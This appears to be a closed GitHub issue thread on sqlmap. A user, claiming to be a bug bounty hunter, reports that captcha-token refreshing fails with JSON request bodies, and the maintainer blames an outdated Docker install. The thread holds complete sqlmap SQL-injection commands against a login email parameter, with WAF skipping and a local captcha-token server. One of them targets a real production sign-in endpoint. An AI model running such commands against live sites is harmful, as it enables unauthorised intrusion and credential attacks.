Closed white-abaddon closed 1 month ago
and what's the format of returned http://127.0.0.1:8000/token/get/
? i have to know what and how to parse
<input type="text" name="captchaToken" value="{{ token }}" />
in html format
@white-abaddon try now (with latest revision)
Still not working. Following up:
<input type="text" name="captchaToken" value="{{ token }}" />
this will return from localhost as a captchaToken.sqlmap --method=POST -u https://blabla.com/ --data='email=username@example.com&password=password&captchaToken=token' -p email --proxy=http://127.0.0.1:8080 --csrf-token "captchaToken" --csrf-url="http://127.0.0.1:8000/token/get/" --abort-code 429
this works fine i mean sqlmap set captcha token.sudo docker run \ --network="host" \ pentest-tool/sqlmap \ --method=POST \ -u https://blabla.com \ --data='{"email": "username@example.com", "password": "password", "captchaToken": ""}' \ -p email \ -H "User-Agent: L" \ -H "Referer: https://blabla.com/" \ -H "Origin: https://blabla.com" \ -H "Content-Type: application/json" \ --delay=10 \ --skip-heuristics \ --skip-waf \ --technique=BT \ --ignore-code 401 \ --abort-code 429 \ --proxy=http://127.0.0.1:8080 \ --csrf-token "captchaToken" \ --csrf-url="http://127.0.0.1:8000/token/get/"
but here captchaToken not set by sqlmap.Everthing working fine by my side i mean captcha token is fetched by sqlmap.
By the way i already update my sqlmap after your last commit
Everthing working fine by my side i mean captcha token is fetched by sqlmap.
<- while everything is working on my side. somebody's side is screwed. i basically emulated everything you said
proof from my side that i haven't "screwed":
Please ignore hostname because i am bug hunter my bugcrowd username white_gh0st.
![Uploading sqlmap.png…]()
Actual command
sudo docker run \ --network="host" \ pentest-tool/sqlmap \ --method=POST \ -u https://api.starlink.com/auth/v1/sign-in \ --data='{"email": "username@example.com", "password": "password", "captchaToken": ""}' \ -p email \ -H "User-Agent: white_gh0st@BugCrowd" \ -H "Referer: https://auth.starlink.com/" \ -H "Origin: https://auth.starlink.com" \ -H "Content-Type: application/json" \ --delay=10 \ --skip-heuristics \ --skip-waf \ --technique=BT \ --ignore-code 401 \ --abort-code 429 \ --proxy=http://127.0.0.1:8080 \ --csrf-token captchaToken \ --csrf-url=http://127.0.0.1:8000/token/get/ \ -v 6
you changed the UA and thus I am not sure that you are using the latest revision
can you please explain to me how can you possibly be serious in this whole conversation when i see this?
version which i pushed for your "problem" was 1.8.4.6
Sorry, i am not able to understand.
you are running 1.8.4.1#dev
for the whole time
my guess is that you are running sqlmap --update
inside some docker container which doesn't persist with the update(s). now, we are ping-ponging here, where you claim that you are using the latest revision, while I can see that the version you have run with --update
was 1.8.4.1#dev (<- where i would expect that you would ATM have latest 1.8.4.6#dev as you explicitly said that you already updated)
won't spend 1 more minute here. closed this whole conversation. by the way, if you say that By the way i already update my sqlmap after your last commit
then you should be really sure about your claim before doing this whole ping-pong here
sqlmap --method=POST -u https://blabla.com/ --data='email=username@example.com&password=password&captchaToken=token' -p email --proxy=http://127.0.0.1:8080 --csrf-token "captchaToken" --csrf-url="http://127.0.0.1:8000/token/get/" --abort-code 429
According to this command, the captchaToken is fetched from localhost and updated in the captchaToken field within the JSON data. However, a problem arises when the data is in JSON format, such as --data={"email": "username@example.com", "password": "password", "captchaToken": ""}. This command is unable to update the captchaToken from localhost.
sudo docker run \ --network="host" \ pentest-tool/sqlmap \ --method=POST \ -u https://blabla.com \ --data='{"email": "username@example.com", "password": "password", "captchaToken": ""}' \ -p email \ -H "User-Agent: L" \ -H "Referer: https://blabla.com/" \ -H "Origin: https://blabla.com" \ -H "Content-Type: application/json" \ --delay=10 \ --skip-heuristics \ --skip-waf \ --technique=BT \ --ignore-code 401 \ --abort-code 429 \ --proxy=http://127.0.0.1:8080 \ --csrf-token "captchaToken" \ --csrf-url="http://127.0.0.1:8000/token/get/"